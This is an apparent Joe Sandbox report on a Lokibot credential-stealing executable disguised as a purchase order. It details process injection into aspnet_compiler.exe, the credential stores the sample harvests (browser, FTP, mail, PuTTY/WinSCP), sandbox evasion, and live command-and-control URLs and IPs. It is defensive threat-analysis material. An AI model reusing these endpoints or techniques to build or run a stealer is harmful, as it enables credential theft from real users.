Source: C:\Users\user\Desktop\1e#U0414.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6876	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6876	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Source: C:\Users\user\Desktop\1e#U0414.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: 1e#U0414.exe, 00000000.00000002.1750465955.00000000045E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: 1e#U0414.exe, 00000000.00000002.1750465955.000000000462E000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004676000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: 1e#U0414.exe, 00000000.00000002.1750465955.0000000004706000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004584000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.0000000004484000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1750465955.000000000452D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: 1e#U0414.exe, 00000000.00000002.1750465955.00000000046BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
Source: aspnet_compiler.exe, 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\1e#U0414.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Users\user\Desktop\1e#U0414.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.cs	Reference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.cs	Reference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.cs	Reference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1e#U0414.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1e#U0414.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: A5E008	Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"			Jump to behavior
Source: C:\Users\user\Desktop\1e#U0414.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"			Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe

Queries volume information: C:\Users\user\Desktop\1e#U0414.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\1e#U0414.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
1e#U0414.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
1e#U0414.exe	100%	Avira	TR/Dropper.MSIL.Gen
1e#U0414.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	100%	Avira URL Cloud	phishing
http://www.ibsensoftware.com/	0%	Avira URL Cloud	safe
http://alphastand.win/alien/fre.php	100%	Avira URL Cloud	phishing
https://dddotx.shop/Mine/PWS/fre.php	100%	Avira URL Cloud	malware
http://alphastand.top/alien/fre.php	100%	Avira URL Cloud	malware
http://dddotx.shop/Mine/PWS/fre.php	100%	Avira URL Cloud	malware
http://alphastand.trade/alien/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dddotx.shop	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dddotx.shop/Mine/PWS/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.win/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.trade/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://dddotx.shop/Mine/PWS/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	dddotx.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518306
Start date and time:	2024-09-25 15:27:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1e#U0414.exe renamed because original name is a hash value
Original Sample Name:	_(PO_46338032)_-- .exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 67 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1e#U0414.exe

Simulations

Behavior and APIs

Time	Type	Description
09:28:38	API Interceptor	128x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	Shipping Documemt.vbs	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php
	Quotes updates request.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/kslt/
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	LOL and profile.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dddotx.shop	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	wm.vbs	Get hash	malicious	PureLog Stealer, XWorm	Browse	188.114.96.3
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	http://mir-belting.com	Get hash	malicious	Unknown	Browse	162.159.140.229
	https://empshentel.com/share/sharefile/	Get hash	malicious	HTMLPhisher	Browse	172.67.177.128
	https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.html	Get hash	malicious	ScreenConnect Tool	Browse	188.114.97.3
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	ptgl503.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	https://odo1s.risongeye.com/oTUk/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Suselx1.exe	Get hash	malicious	LummaC	Browse	172.67.189.2
	https://www.concursolutions.us.com/lstQ3Ewa4RAt2API1AnsoTxu4RAcQ3EpQ3E4RAfoTx4RAmsz01coTxm	Get hash	malicious	Unknown	Browse	1.1.1.1

Process:	C:\Users\user\Desktop\1e#U0414.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D898504A722BFF1524134C6AB6A5EAA5
SHA1:	E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
SHA-256:	878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
SHA-512:	26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.473390936917942
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	1e#U0414.exe
File size:	168'448 bytes
MD5:	ed9fe2c20a68172921c064d0d9886b7b
SHA1:	d892be8018cbc88b8cdd0db2338f643448630757
SHA256:	bfcc16e302514e80fdc77675291f1bdb32796e7b77274f7596049938d0652347
SHA512:	8fdaaedc9585e72ebfdb8ba85e79f52614d9b3626327ac882cc4a2f108ed71335e013b173a628cd83135f8806644f9af4ac1f7026a4a0ae71f12057534269160
SSDEEP:	3072:OgX3OY/NPH8Aq+XdOeuohMvEuf555vyWd+9MtGGE0vWGNF7owCCx7/WgafCzg:WOLOAhLuhvyi6GTb8wCC5/Wgb
TLSH:	4FF3ADA87BFA9E53D14A6732159205051738ED27FA4BFF4F4689307A1E723E61C0E683
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f..............0..z..........*.... ........@.. ....................................`................................

File Icon


Icon Hash:	010d4c4948182c0e

Static PE Info

General

Entrypoint:	0x42992a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F2892F [Tue Sep 24 09:41:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x298d0	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x1264	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x21454	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x27930	0x27a00	d447f9c4e8ac8396ad93736d4b377033	False	0.8035846313091483	data	7.531903789782718	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0xc	0x200	4fff437a5d708043657d9e04318c81b4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x1264	0x1400	9b10bfd37a73372606617dc2c50b8350	False	0.301953125	data	4.131782053141191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x2c130	0xc28	Device independent bitmap graphic, 23 x 64 x 32, image size 2944, resolution 11811 x 11811 px/m	0.2577120822622108
RT_GROUP_ICON	0x2cd58	0x14	data	1.1
RT_VERSION	0x2cd6c	0x30c	data	0.4256410256410256
RT_MANIFEST	0x2d078	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T15:28:34.491221+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	56006	TCP
